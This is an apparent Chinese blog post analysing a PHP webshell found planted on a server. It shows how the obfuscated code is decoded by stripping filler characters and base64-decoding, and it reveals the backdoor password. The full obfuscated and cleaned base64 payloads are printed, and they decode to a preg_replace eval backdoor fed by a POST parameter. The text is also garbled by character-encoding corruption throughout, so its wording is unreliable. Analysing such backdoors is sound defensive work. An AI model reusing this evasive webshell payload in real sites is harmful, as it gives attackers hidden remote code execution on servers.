一次巡查服務(wù)器的時候�����,發(fā)現(xiàn)網(wǎng)站存在漏洞�,并已被植入后門���。因?yàn)榉⻊?wù)器有安全狗�����,由此斷定后門代碼是免殺的�����。
首先我們看看加密的源碼
其中加色部分$drx.$ydd.$hq.$qvz按照排列依次拼接
“CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4iYyIuImUiOgcwokaGgo
Ii9bZGlzY3V6XSgc9lIiwkX1BPUgc1RbJ2gcxvdnZgcldSddLCJBY2Nlc3MgciKTsK”這樣的一串不規(guī)則的亂碼��。
現(xiàn)在的程序就變成了這樣
就算不懂PHP源代碼都能看出
$rc = str_replace("v","","svtvr_rveplvavce")�����;"svtvr_rveplvavce"中去掉“v”剛好就是“str_replace”
那么下面這段加密內(nèi)容也同樣要去掉多余“gc”
“CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4iYyIuImUiOgcwokaGgoI
i9bZGlzY3V6XSgc9lIiwkX1BPUgc1RbJ2gcxvdnZgcldSddLCJBY2Nlc3MgciKTsK”
得到一下base64_decode真實(shí)的加密內(nèi)容
“CiRoaCA9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIi4icCIuImwiLiJhIi4iYyIuImUiOwokaGgoIi9bZGlzY3V
6XS9lIiwkX1BPU1RbJ2xvdnZldSddLCJBY2Nlc3MiKTsK"
我們在通過base64_decode解密剛才獲取的內(nèi)容看看
那么真實(shí)的密碼就暴露了"lovveu"
在上WEB測試密碼確實(shí)正確��。
